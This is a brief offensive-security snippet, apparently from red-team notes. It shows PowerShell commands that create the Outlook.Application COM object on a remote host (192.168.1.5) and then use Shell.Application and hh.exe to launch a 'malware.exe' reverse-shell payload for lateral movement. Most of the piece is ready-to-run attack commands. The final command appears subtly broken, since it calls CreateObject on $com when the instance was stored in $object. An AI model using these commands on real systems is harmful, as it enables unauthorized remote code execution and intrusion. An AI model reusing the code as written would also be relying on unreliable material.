XCCVLTVM

Using LOLBins via COM Objects for Reverse Shell

A COM object is created remotely on the target machine (192.168.1.5) using the Outlook.Application ProgID. This technique demonstrates remote instantiation of a COM object over the network.

$com = [Type]::GetTypeFromProgID('Outlook.Application', '192.168.1.5')
$object = [System.Activator]::CreateInstance($com)

This command lists all methods containing “Create” in their names within the instantiated COM object. It helps identify potential method calls for further exploitation.

$object | Get-Member -Name "*Create*"

This leads to lateral movement , as the executed binary contains a reverse shell , allowing the attacker to gain remote access to the compromised system.

$com.CreateObject("Shell.Application").ShellExecute("C:\Windows\SysWOW64\hh.exe", "C:\Users\malefic\Desktop\malware.exe", "", "", 1)

Code execution is achieved using a Living off the Land Binary (LOLBins) approach. The Shell.Application COM object is used to invoke hh.exe, which then executes a malicious payload (malware.exe).